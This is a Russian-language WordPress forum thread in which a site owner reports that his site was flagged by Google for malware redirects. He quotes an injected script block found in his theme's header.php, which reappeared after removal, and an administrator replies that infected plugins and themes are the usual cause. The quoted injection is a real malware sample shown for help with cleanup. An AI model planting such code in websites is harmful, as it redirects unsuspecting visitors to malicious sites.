• ДОБРО ПОЖАЛОВАТЬ В КЛУБ ПО WORDPRESS

    Мы активно растущий клуб по WordPress и нам нужна помощь каждого человека, в том числе и Ваша! Не стесняйтесь и станьте частью большого сообщества.
    Мы делимся новостями, отытом и полезными советами! Пройдите простую регистрацию, чтобы пользоваться всеми возможностями нашего клуба.

    Присоединяйтесь к нам, вам обязательно понравится - Присоединится

Вопрос Обнаружение и удаление вирусов

olgerd70

НОВИЧОК

olgerd70

НОВИЧОК
Сообщения
1
Проблема в следующем - недавно Гугл прислал уведомление о том, что мой сайт на WP перенаправляет посетителей на сайт, содержащий вредоносное ПО, соответственно и мой сайт получил "черную метку от Гугла".
На сайте стоит антивирусный плагин WP Antivirus Site Protection, но сканирование результатов не дало. Вручную просмотрев шаблоны обнаружил в header.php подозрительный скрипт с какой-то левой ссылкой:

$yslq = "<script type=\"text/javascript\" src=\"Для просмотра ссылки Войди или Зарегистрируйся"></script>";

<?php
#7f3f8c#
if(empty($yslq)) {

echo $yslq;
}
#/7f3f8c#
?>

Удалил эту бяку, поменял пароль к админке, отписался в Гугл и метку сняли. Однако, по прошествии недели опять пришло письмо от Гугла! Каково было удивление, когда на том же самом месте нашел тот же скрипт, только со ссылкой на другой сайт.
Скрипт удалил, поменял еще и пароль к ФТП (хотя был он довольно сложный), но остаются опасения, что где-то сидит еще какой-то хитрый скрипт, периодически оживляющий эти ссылки.

Вопрос к cпециалистам: что можно сделать? Готов оплатить реальную помощь.
 

Попай

АДМИНИСТРАТОР

Попай

АДМИНИСТРАТОР
Сообщения
3,247
Обычно такие дырки есть в плагинах или темах, которые скачиваются непонятно где, со встроенными вирусами. Проверяйте сначала плагины, а потом и шаблон.
 

Топ поддержки


Сверху